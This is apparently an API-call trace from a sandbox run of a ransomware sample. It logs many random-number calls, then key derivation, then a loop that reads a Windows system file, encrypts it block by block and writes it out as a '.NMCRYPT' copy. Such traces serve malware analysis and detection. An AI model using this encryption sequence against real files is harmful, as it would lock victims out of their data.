CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.850] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.851] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.852] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.852] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.853] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0152.853] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0152.853] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad6b8) returned 1 [0152.853] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0152.853] CryptSetKeyParam (hKey=0x9ad6b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0152.853] wcslen (_String="\\\\?\\") returned 0x4 [0152.853] CryptDuplicateKey (in: hKey=0x9ad6b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad7f8) returned 1 [0152.853] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0152.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0152.854] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=3584) returned 1 [0152.854] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0152.855] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.855] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.855] GetLastError () returned 0x0 [0152.855] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.921] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.922] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.922] GetLastError () returned 0x0 [0152.922] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.922] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.922] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.922] GetLastError () returned 0x0 [0152.922] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.922] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.922] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.922] GetLastError () returned 0x0 [0152.922] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.922] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.922] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.922] GetLastError () returned 0x0 [0152.922] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.922] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.922] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.922] GetLastError () returned 0x0 [0152.922] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.922] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.923] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.923] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.923] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.923] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.923] GetLastError () returned 0x0 [0152.923] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.923] 